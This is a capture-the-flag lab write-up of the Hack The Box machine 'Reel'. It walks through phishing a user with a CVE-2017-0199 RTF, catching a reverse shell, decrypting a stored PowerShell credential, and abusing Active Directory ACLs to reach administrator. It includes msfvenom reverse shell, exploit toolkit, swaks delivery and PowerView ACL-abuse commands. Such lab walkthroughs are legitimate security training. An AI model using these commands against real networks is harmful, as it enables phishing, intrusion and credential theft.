Hello everyone , HTB reel was a hard difficulty active directory machine , starting off with the nmap scan we have only 3 ports , ftp , ssh and smtp being an active directory machine this may seem odd as kerberos service should be running but it didn’t really felt the need of it , enumerating the ftp we can login as anonymous user and we can see few files out which a word document would give us an email to which we send an attachment through smtp following CVE-2017-0199
. We get a reverse shell as nico
user and in this uses’s Desktop folder we can find a PSCredential in xml file which has tom
’s redential which can decrypted as we own the xml , after decrypting and getting the plain text password we can run Sharphound
through IEX
to bypass execution policy for powershell scripts , after analyzing the data from sharphound in Bloodhound
we can see that tom has WriteOwner
permission on Claire
user which can make us own claire object and give all rights on that object to reset the password , now checking what we can do with claire from bloodhound it shows that we have WriteDacl
rights on Backup_Admin
group which can allow us to add users into this group and being in this group we can access backup scripts in Administrators
folder which will gives this account’s password
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS
SessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
PORT 21 (FTP)
FTP has anonymous login enabled so we can easily login
We see a folder named documents
And in the folder we can see three files
Opening the Applocker.docx
file it tell about making rules for some scripts
Opening Windows Event Forwarding.docx
will warn us having a macro in it and will fail to recover document
Lastly the text file has this content in it
Please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don’t have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running exiftool
on word documents we get a username
PORT 25 (SMTP)
To check if it’s a correct email address we can use VRFY
to check but that command is not allowed in this smtp server
Instead we can use RCPT
to check if the email address is valid
And nico@megabank.com
is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE CVE-2017-0199
http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html
Foothold
Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to generate a hta file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh
> abc.htapython cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1
0.14.17/abc.hta
Now to send the mail with the attachment , I was having difficulty to figure out to send it , on google everyone mentioned doing it through telnet by specifying content-type and other headers but I found a neat tool called sawks
http://www.jetmore.org/john/code/swaks/
So running this to send an email to nico
and starting the python server to hosts the hta file
swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf
In nico
's directory in Desktop
folder we can see a cred.xml
file, reading that file it seems that there's an encrypted password for Tom
Privilege Escalation (Tom)
Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang
So we can just pass arguments to powershell and decrypt the password for user Tom
powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password"
Now that we have credentials for tom user we can use ssh to login
Checking which groups this user is in
In the Desktop directory we see a folder AD Audit
which already has bloodhound folder in it
And from the text file it seems that no path is there to domain admin
We can import and run PowerView
commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine
Privilege Escalation (Claire)
So we can bypass this by loading the script in the memory through IEX
which downloads the script and loads it into the memory
`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip`
To transfer this we can use impacket’s smbserver to copy the zip file onto our machine
After this is transferred we can use bloodhound GUI to see what we can abuse in AD
We have WriteOwner
access on claire object so we can own this object and give All
rights on this object in order to reset password
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose
Privilege Escalation (Administrator)
Now through Claire
we can see that we have WriteDacl
on BACKUP_ADMINS
We can see the abuse that we can add users to this group
So logging in back with tom we see that we are a member of this group now
But it gets reverted quickly so we need to be quick in navigating to Administrators
folder and there we will find some backup scripts out which BackupScript.ps1
has a password for administrator account
Having the password we can login through ssh
Further loading Mimikatz
we can dump SAM hashes
References
- https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
- https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
- https://github.com/bhdresh/CVE-2017-0199
- https://linux.die.net/man/1/swaks
- http://www.jetmore.org/john/code/swaks/
- https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993